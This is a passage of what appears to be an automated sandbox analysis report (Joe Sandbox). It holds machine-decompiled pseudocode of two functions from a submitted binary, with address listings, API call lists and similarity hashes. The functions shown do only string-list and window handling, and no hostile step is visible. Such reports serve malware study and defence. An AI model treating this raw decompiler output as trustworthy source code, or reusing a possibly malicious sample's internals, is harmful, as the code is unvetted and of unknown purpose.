                                                                                                                                                                                                                                                                                          										_t55 = _t64[1];
                                                                                                                                                                                                                                                                                          										__eflags = _t89 - _t55;
                                                                                                                                                                                                                                                                                          										if(_t89 < _t55) {
                                                                                                                                                                                                                                                                                          											__eflags = _t89 - _t55 - 1;
                                                                                                                                                                                                                                                                                          											if(_t89 != _t55 - 1) {
                                                                                                                                                                                                                                                                                          												__eflags =  *_t64 + _t89 * 0x104;
                                                                                                                                                                                                                                                                                          												E000F1240( *_t64 + _t89 * 0x104,  *_t64 + _t89 * 0x104, (_t55 - _t89) * 0x104,  &(( *_t64 + _t89 * 0x104)[0x104]), (_t55 - _t89) * 0x104 - 0x104);
                                                                                                                                                                                                                                                                                          												_t98 = _t98 + 0x10;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t64[1] = _t64[1] - 1;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L12;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t89 = _t89 + 1;
                                                                                                                                                                                                                                                                                          										_t83 = _t83 + 0x104;
                                                                                                                                                                                                                                                                                          										__eflags = _t89 - _t64[1];
                                                                                                                                                                                                                                                                                          										if(_t89 < _t64[1]) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L12;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L38;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          							L22:
                                                                                                                                                                                                                                                                                          							_push(0x8007000e);
                                                                                                                                                                                                                                                                                          							E000F1170(_t78);
                                                                                                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                                                                                                          							_push(0x80070057);
                                                                                                                                                                                                                                                                                          							E000F1170(_t78);
                                                                                                                                                                                                                                                                                          							L24:
                                                                                                                                                                                                                                                                                          							_t23 =  &(_t64[1]);
                                                                                                                                                                                                                                                                                          							 *_t23 = _t64[1] - 1;
                                                                                                                                                                                                                                                                                          							__eflags =  *_t23;
                                                                                                                                                                                                                                                                                          							L25:
                                                                                                                                                                                                                                                                                          							_t78 = _t64[1];
                                                                                                                                                                                                                                                                                          							_t48 = _t64[2];
                                                                                                                                                                                                                                                                                          							__eflags = _t78 - _t48;
                                                                                                                                                                                                                                                                                          							if(_t78 != _t48) {
                                                                                                                                                                                                                                                                                          								L35:
                                                                                                                                                                                                                                                                                          								_t86 = _t64[1] * 0x104 +  *_t64;
                                                                                                                                                                                                                                                                                          								__eflags = _t86;
                                                                                                                                                                                                                                                                                          								if(_t86 != 0) {
                                                                                                                                                                                                                                                                                          									_t91 =  &_v276;
                                                                                                                                                                                                                                                                                          									memcpy(_t86, _t91, 0x41 << 2);
                                                                                                                                                                                                                                                                                          									_t86 = _t91 + 0x82;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t64[1] = _t64[1] + 1;
                                                                                                                                                                                                                                                                                          								_t49 = E000FD690(_t78, _t64);
                                                                                                                                                                                                                                                                                          								__eflags = _v8 ^ _t97;
                                                                                                                                                                                                                                                                                          								return E001059E6(_t49, _t64, _v8 ^ _t97, _t78, _t86, _t64);
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t72 =  *_t64;
                                                                                                                                                                                                                                                                                          								__eflags =  &_v276 - _t72;
                                                                                                                                                                                                                                                                                          								if( &_v276 >= _t72) {
                                                                                                                                                                                                                                                                                          									_t83 =  &_v276;
                                                                                                                                                                                                                                                                                          									__eflags =  &_v276 - _t48 * 0x104 + _t72;
                                                                                                                                                                                                                                                                                          									if( &_v276 < _t48 * 0x104 + _t72) {
                                                                                                                                                                                                                                                                                          										L28:
                                                                                                                                                                                                                                                                                          										_push(0x80004005);
                                                                                                                                                                                                                                                                                          										_t48 = E000F1170(_t78);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags = _t48;
                                                                                                                                                                                                                                                                                          								if(_t48 != 0) {
                                                                                                                                                                                                                                                                                          									_t88 = _t78 + _t78;
                                                                                                                                                                                                                                                                                          									__eflags = _t88;
                                                                                                                                                                                                                                                                                          									if(_t88 < 0) {
                                                                                                                                                                                                                                                                                          										goto L5;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										__eflags = _t88 - 0x7e07e0;
                                                                                                                                                                                                                                                                                          										if(_t88 > 0x7e07e0) {
                                                                                                                                                                                                                                                                                          											goto L5;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L33;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t29 =  &(_t48[1]); // 0x1
                                                                                                                                                                                                                                                                                          									_t88 = _t29;
                                                                                                                                                                                                                                                                                          									L33:
                                                                                                                                                                                                                                                                                          									_t52 = E00106254(_t72, _t88, 0x104);
                                                                                                                                                                                                                                                                                          									_t98 = _t98 + 0xc;
                                                                                                                                                                                                                                                                                          									__eflags = _t52;
                                                                                                                                                                                                                                                                                          									if(_t52 == 0) {
                                                                                                                                                                                                                                                                                          										goto L5;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t64[2] = _t88;
                                                                                                                                                                                                                                                                                          										 *_t64 = _t52;
                                                                                                                                                                                                                                                                                          										goto L35;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L38:
                                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                                          0x000fb170
                                                                                                                                                                                                                                                                                          0x000fb170
                                                                                                                                                                                                                                                                                          0x000fb179
                                                                                                                                                                                                                                                                                          0x000fb180
                                                                                                                                                                                                                                                                                          0x000fb184
                                                                                                                                                                                                                                                                                          0x000fb187
                                                                                                                                                                                                                                                                                          0x000fb18f
                                                                                                                                                                                                                                                                                          0x000fb1bf
                                                                                                                                                                                                                                                                                          0x000fb1d0
                                                                                                                                                                                                                                                                                          0x000fb191
                                                                                                                                                                                                                                                                                          0x000fb191
                                                                                                                                                                                                                                                                                          0x000fb19f
                                                                                                                                                                                                                                                                                          0x000fb1a9
                                                                                                                                                                                                                                                                                          0x000fb1a1
                                                                                                                                                                                                                                                                                          0x000fb1a1
                                                                                                                                                                                                                                                                                          0x000fb1a1
                                                                                                                                                                                                                                                                                          0x000fb1bd
                                                                                                                                                                                                                                                                                          0x000fb1d1
                                                                                                                                                                                                                                                                                          0x000fb1d3
                                                                                                                                                                                                                                                                                          0x000fb1d6
                                                                                                                                                                                                                                                                                          0x000fb213
                                                                                                                                                                                                                                                                                          0x000fb213
                                                                                                                                                                                                                                                                                          0x000fb216
                                                                                                                                                                                                                                                                                          0x000fb219
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb21f
                                                                                                                                                                                                                                                                                          0x000fb21f
                                                                                                                                                                                                                                                                                          0x000fb221
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb227
                                                                                                                                                                                                                                                                                          0x000fb22a
                                                                                                                                                                                                                                                                                          0x000fb22c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb232
                                                                                                                                                                                                                                                                                          0x000fb232
                                                                                                                                                                                                                                                                                          0x000fb23d
                                                                                                                                                                                                                                                                                          0x000fb244
                                                                                                                                                                                                                                                                                          0x000fb24d
                                                                                                                                                                                                                                                                                          0x000fb252
                                                                                                                                                                                                                                                                                          0x000fb255
                                                                                                                                                                                                                                                                                          0x000fb258
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb25e
                                                                                                                                                                                                                                                                                          0x000fb25e
                                                                                                                                                                                                                                                                                          0x000fb265
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb265
                                                                                                                                                                                                                                                                                          0x000fb258
                                                                                                                                                                                                                                                                                          0x000fb22c
                                                                                                                                                                                                                                                                                          0x000fb221
                                                                                                                                                                                                                                                                                          0x000fb1d8
                                                                                                                                                                                                                                                                                          0x000fb1d8
                                                                                                                                                                                                                                                                                          0x000fb1d8
                                                                                                                                                                                                                                                                                          0x000fb1e0
                                                                                                                                                                                                                                                                                          0x000fb1e0
                                                                                                                                                                                                                                                                                          0x000fb1e2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb1e8
                                                                                                                                                                                                                                                                                          0x000fb1eb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb1f1
                                                                                                                                                                                                                                                                                          0x000fb1fd
                                                                                                                                                                                                                                                                                          0x000fb203
                                                                                                                                                                                                                                                                                          0x000fb205
                                                                                                                                                                                                                                                                                          0x000fb26c
                                                                                                                                                                                                                                                                                          0x000fb26f
                                                                                                                                                                                                                                                                                          0x000fb271
                                                                                                                                                                                                                                                                                          0x000fb276
                                                                                                                                                                                                                                                                                          0x000fb278
                                                                                                                                                                                                                                                                                          0x000fb291
                                                                                                                                                                                                                                                                                          0x000fb29c
                                                                                                                                                                                                                                                                                          0x000fb2a1
                                                                                                                                                                                                                                                                                          0x000fb2a1
                                                                                                                                                                                                                                                                                          0x000fb2a4
                                                                                                                                                                                                                                                                                          0x000fb2a4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb207
                                                                                                                                                                                                                                                                                          0x000fb207
                                                                                                                                                                                                                                                                                          0x000fb208
                                                                                                                                                                                                                                                                                          0x000fb20e
                                                                                                                                                                                                                                                                                          0x000fb211
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb211
                                                                                                                                                                                                                                                                                          0x000fb205
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb1eb
                                                                                                                                                                                                                                                                                          0x000fb2b7
                                                                                                                                                                                                                                                                                          0x000fb2bd
                                                                                                                                                                                                                                                                                          0x000fb2bd
                                                                                                                                                                                                                                                                                          0x000fb2c2
                                                                                                                                                                                                                                                                                          0x000fb2c7
                                                                                                                                                                                                                                                                                          0x000fb2c7
                                                                                                                                                                                                                                                                                          0x000fb2cc
                                                                                                                                                                                                                                                                                          0x000fb2d1
                                                                                                                                                                                                                                                                                          0x000fb2d1
                                                                                                                                                                                                                                                                                          0x000fb2d1
                                                                                                                                                                                                                                                                                          0x000fb2d1
                                                                                                                                                                                                                                                                                          0x000fb2d4
                                                                                                                                                                                                                                                                                          0x000fb2d4
                                                                                                                                                                                                                                                                                          0x000fb2d7
                                                                                                                                                                                                                                                                                          0x000fb2da
                                                                                                                                                                                                                                                                                          0x000fb2dc
                                                                                                                                                                                                                                                                                          0x000fb344
                                                                                                                                                                                                                                                                                          0x000fb34d
                                                                                                                                                                                                                                                                                          0x000fb34d
                                                                                                                                                                                                                                                                                          0x000fb34f
                                                                                                                                                                                                                                                                                          0x000fb356
                                                                                                                                                                                                                                                                                          0x000fb35c
                                                                                                                                                                                                                                                                                          0x000fb35c
                                                                                                                                                                                                                                                                                          0x000fb35c
                                                                                                                                                                                                                                                                                          0x000fb35e
                                                                                                                                                                                                                                                                                          0x000fb363
                                                                                                                                                                                                                                                                                          0x000fb36c
                                                                                                                                                                                                                                                                                          0x000fb377
                                                                                                                                                                                                                                                                                          0x000fb2de
                                                                                                                                                                                                                                                                                          0x000fb2de
                                                                                                                                                                                                                                                                                          0x000fb2e6
                                                                                                                                                                                                                                                                                          0x000fb2e8
                                                                                                                                                                                                                                                                                          0x000fb2f4
                                                                                                                                                                                                                                                                                          0x000fb2fa
                                                                                                                                                                                                                                                                                          0x000fb2fc
                                                                                                                                                                                                                                                                                          0x000fb2fe
                                                                                                                                                                                                                                                                                          0x000fb2fe
                                                                                                                                                                                                                                                                                          0x000fb303
                                                                                                                                                                                                                                                                                          0x000fb303
                                                                                                                                                                                                                                                                                          0x000fb2fc
                                                                                                                                                                                                                                                                                          0x000fb308
                                                                                                                                                                                                                                                                                          0x000fb30a
                                                                                                                                                                                                                                                                                          0x000fb311
                                                                                                                                                                                                                                                                                          0x000fb314
                                                                                                                                                                                                                                                                                          0x000fb316
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb31c
                                                                                                                                                                                                                                                                                          0x000fb31c
                                                                                                                                                                                                                                                                                          0x000fb322
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb322
                                                                                                                                                                                                                                                                                          0x000fb30c
                                                                                                                                                                                                                                                                                          0x000fb30c
                                                                                                                                                                                                                                                                                          0x000fb30c
                                                                                                                                                                                                                                                                                          0x000fb328
                                                                                                                                                                                                                                                                                          0x000fb32f
                                                                                                                                                                                                                                                                                          0x000fb334
                                                                                                                                                                                                                                                                                          0x000fb337
                                                                                                                                                                                                                                                                                          0x000fb339
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb33f
                                                                                                                                                                                                                                                                                          0x000fb33f
                                                                                                                                                                                                                                                                                          0x000fb342
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb342
                                                                                                                                                                                                                                                                                          0x000fb339
                                                                                                                                                                                                                                                                                          0x000fb30a
                                                                                                                                                                                                                                                                                          0x000fb2dc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb1bd
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000FB198
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000FB1A9
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001), ref: 000FB1B5
                                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,?), ref: 000FB1FD
                                                                                                                                                                                                                                                                                          • _memmove_s.LIBCMT ref: 000FB24D
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 000FB2B7
                                                                                                                                                                                                                                                                                          • __recalloc.LIBCMT ref: 000FB32F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$ExceptionRaise__recalloc_memmove_slstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 959487417-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 419414377df4f2d4bee09ac21a760d28608d99fe05e32cff0e7f8b773593c90f
                                                                                                                                                                                                                                                                                          • Instruction ID: 5618ec0f218e1034df906c5a1e8c5a8565cedab251aaf5e06dc41f8d723dd55a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 419414377df4f2d4bee09ac21a760d28608d99fe05e32cff0e7f8b773593c90f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6519172A011289BDB249F14CD857FDB7A9EB44700F0581A5EF09AF546D774AD80DE90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                          			E00102760(long* _a4, long _a8) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				CHAR* _v24;
                                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v32;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t45;
                                                                                                                                                                                                                                                                                          				long _t48;
                                                                                                                                                                                                                                                                                          				char _t49;
                                                                                                                                                                                                                                                                                          				int _t54;
                                                                                                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                                                                                                          				long _t59;
                                                                                                                                                                                                                                                                                          				long _t60;
                                                                                                                                                                                                                                                                                          				long _t62;
                                                                                                                                                                                                                                                                                          				int _t67;
                                                                                                                                                                                                                                                                                          				char _t72;
                                                                                                                                                                                                                                                                                          				long _t76;
                                                                                                                                                                                                                                                                                          				CHAR* _t86;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t88;
                                                                                                                                                                                                                                                                                          				CHAR* _t91;
                                                                                                                                                                                                                                                                                          				LONG* _t94;
                                                                                                                                                                                                                                                                                          				LONG* _t95;
                                                                                                                                                                                                                                                                                          				long* _t98;
                                                                                                                                                                                                                                                                                          				signed int _t103;
                                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                                          				void* _t105;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010FB00);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t105 = _t104 - 0x10;
                                                                                                                                                                                                                                                                                          				_t45 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_push(_t45 ^ _t103);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t98 = _a4;
                                                                                                                                                                                                                                                                                          				if(_t98 == 0) {
                                                                                                                                                                                                                                                                                          					_v28 = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v28 = _t98 - 0x24;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t48 =  *_t98;
                                                                                                                                                                                                                                                                                          				_t98[4] = 1;
                                                                                                                                                                                                                                                                                          				if(_t48 == 0) {
                                                                                                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                                                                                                          					_t49 =  *0x15ad30; // 0x15ad2c
                                                                                                                                                                                                                                                                                          					_v20 = _t49;
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					_v32 = _v28 + 4;
                                                                                                                                                                                                                                                                                          					E001033C0( &_v20, _v28 + 4);
                                                                                                                                                                                                                                                                                          					_t72 = _v20;
                                                                                                                                                                                                                                                                                          					__eflags =  *(_t72 - 8);
                                                                                                                                                                                                                                                                                          					if( *(_t72 - 8) == 0) {
                                                                                                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                                                                                                          						E000F5870( &(_t98[1]), _t72,  &_v20);
                                                                                                                                                                                                                                                                                          						_t72 = _v20;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t62 = E00105B41(_t72, "\n\r");
                                                                                                                                                                                                                                                                                          						_t105 = _t105 + 8;
                                                                                                                                                                                                                                                                                          						__eflags = _t62;
                                                                                                                                                                                                                                                                                          						if(_t62 != 0) {
                                                                                                                                                                                                                                                                                          							__eflags = _t62 - _t72 - 0xffffffff;
                                                                                                                                                                                                                                                                                          							if(_t62 - _t72 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          								goto L10;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t91 = _t98[2];
                                                                                                                                                                                                                                                                                          					__eflags =  *(_t91 - 0xc);
                                                                                                                                                                                                                                                                                          					if( *(_t91 - 0xc) < 0) {
                                                                                                                                                                                                                                                                                          						_t86 =  *0x15ad30; // 0x15ad2c
                                                                                                                                                                                                                                                                                          						_v24 = _t86;
                                                                                                                                                                                                                                                                                          						__eflags = _t91;
                                                                                                                                                                                                                                                                                          						if(_t91 != 0) {
                                                                                                                                                                                                                                                                                          							_t54 = lstrlenA(_t91);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t54 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E000F5F10(_t54,  &_v24, _t91);
                                                                                                                                                                                                                                                                                          						_t91 = _v24;
                                                                                                                                                                                                                                                                                          						_t98 = _a4;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t24 = _t91 - 0xc; // -12
                                                                                                                                                                                                                                                                                          						_v24 = _t91;
                                                                                                                                                                                                                                                                                          						InterlockedIncrement(_t24);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t56 = _v28;
                                                                                                                                                                                                                                                                                          					_v8 = 1;
                                                                                                                                                                                                                                                                                          					__eflags =  *(_t56 + 0x40);
                                                                                                                                                                                                                                                                                          					_t76 = 0x10000;
                                                                                                                                                                                                                                                                                          					if( *(_t56 + 0x40) != 0) {
                                                                                                                                                                                                                                                                                          						_t76 = 0x10001;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					__eflags =  *(_t56 + 0x38);
                                                                                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          						__eflags = _t76;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t59 = E000F70F0(__eflags, _a8, _t72, _t91, _t76,  *_v32);
                                                                                                                                                                                                                                                                                          					 *_t98 = _t59;
                                                                                                                                                                                                                                                                                          					__eflags = _t59;
                                                                                                                                                                                                                                                                                          					if(_t59 != 0) {
                                                                                                                                                                                                                                                                                          						_t98[3] = _a8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t60 = _t91 - 0xc;
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					__eflags = _t60 - 0x15ad20;
                                                                                                                                                                                                                                                                                          					if(_t60 != 0x15ad20) {
                                                                                                                                                                                                                                                                                          						_t95 =  &(_t91[0xfffffffffffffff4]);
                                                                                                                                                                                                                                                                                          						_t60 = InterlockedDecrement(_t95);
                                                                                                                                                                                                                                                                                          						__eflags = _t60;
                                                                                                                                                                                                                                                                                          						if(_t60 <= 0) {
                                                                                                                                                                                                                                                                                          							_push(_t95);
                                                                                                                                                                                                                                                                                          							_t60 = E001062C2();
                                                                                                                                                                                                                                                                                          							_t105 = _t105 + 4;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                          					__eflags = _t72 - 0xc - 0x15ad20;
                                                                                                                                                                                                                                                                                          					if(_t72 - 0xc != 0x15ad20) {
                                                                                                                                                                                                                                                                                          						_t94 = _t72 - 0xc;
                                                                                                                                                                                                                                                                                          						_t60 = InterlockedDecrement(_t94);
                                                                                                                                                                                                                                                                                          						__eflags = _t60;
                                                                                                                                                                                                                                                                                          						if(_t60 <= 0) {
                                                                                                                                                                                                                                                                                          							_push(_t94);
                                                                                                                                                                                                                                                                                          							_t60 = E001062C2();
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					return _t60;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t88 =  *(_t48 + 4);
                                                                                                                                                                                                                                                                                          					if(_t98[3] != _a8) {
                                                                                                                                                                                                                                                                                          						SendMessageA(_t88, 0x10, 0, 0);
                                                                                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						SetActiveWindow(_t88);
                                                                                                                                                                                                                                                                                          						_t67 = ShowWindow( *( *_t98 + 4), 5);
                                                                                                                                                                                                                                                                                          						 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          						return _t67;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
































                                                                                                                                                                                                                                                                                          0x00102763
                                                                                                                                                                                                                                                                                          0x00102765
                                                                                                                                                                                                                                                                                          0x00102770
                                                                                                                                                                                                                                                                                          0x00102771
                                                                                                                                                                                                                                                                                          0x00102777
                                                                                                                                                                                                                                                                                          0x0010277e
                                                                                                                                                                                                                                                                                          0x00102782
                                                                                                                                                                                                                                                                                          0x00102788
                                                                                                                                                                                                                                                                                          0x0010278f
                                                                                                                                                                                                                                                                                          0x00102799
                                                                                                                                                                                                                                                                                          0x00102791
                                                                                                                                                                                                                                                                                          0x00102794
                                                                                                                                                                                                                                                                                          0x00102794
                                                                                                                                                                                                                                                                                          0x0010279c
                                                                                                                                                                                                                                                                                          0x0010279e
                                                                                                                                                                                                                                                                                          0x001027a7
                                                                                                                                                                                                                                                                                          0x001027e8
                                                                                                                                                                                                                                                                                          0x001027e8
                                                                                                                                                                                                                                                                                          0x001027ed
                                                                                                                                                                                                                                                                                          0x001027f9
                                                                                                                                                                                                                                                                                          0x001027fc
                                                                                                                                                                                                                                                                                          0x001027ff
                                                                                                                                                                                                                                                                                          0x00102804
                                                                                                                                                                                                                                                                                          0x00102807
                                                                                                                                                                                                                                                                                          0x0010280b
                                                                                                                                                                                                                                                                                          0x00102826
                                                                                                                                                                                                                                                                                          0x0010282c
                                                                                                                                                                                                                                                                                          0x00102831
                                                                                                                                                                                                                                                                                          0x0010280d
                                                                                                                                                                                                                                                                                          0x00102813
                                                                                                                                                                                                                                                                                          0x00102818
                                                                                                                                                                                                                                                                                          0x0010281b
                                                                                                                                                                                                                                                                                          0x0010281d
                                                                                                                                                                                                                                                                                          0x00102821
                                                                                                                                                                                                                                                                                          0x00102824
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00102824
                                                                                                                                                                                                                                                                                          0x0010281d
                                                                                                                                                                                                                                                                                          0x00102834
                                                                                                                                                                                                                                                                                          0x00102837
                                                                                                                                                                                                                                                                                          0x0010283b
                                                                                                                                                                                                                                                                                          0x0010284c
                                                                                                                                                                                                                                                                                          0x00102852
                                                                                                                                                                                                                                                                                          0x00102855
                                                                                                                                                                                                                                                                                          0x00102857
                                                                                                                                                                                                                                                                                          0x0010285e
                                                                                                                                                                                                                                                                                          0x00102859
                                                                                                                                                                                                                                                                                          0x00102859
                                                                                                                                                                                                                                                                                          0x00102859
                                                                                                                                                                                                                                                                                          0x0010286a
                                                                                                                                                                                                                                                                                          0x0010286f
                                                                                                                                                                                                                                                                                          0x00102872
                                                                                                                                                                                                                                                                                          0x0010283d
                                                                                                                                                                                                                                                                                          0x0010283d
                                                                                                                                                                                                                                                                                          0x00102841
                                                                                                                                                                                                                                                                                          0x00102844
                                                                                                                                                                                                                                                                                          0x00102844
                                                                                                                                                                                                                                                                                          0x00102875
                                                                                                                                                                                                                                                                                          0x00102878
                                                                                                                                                                                                                                                                                          0x0010287c
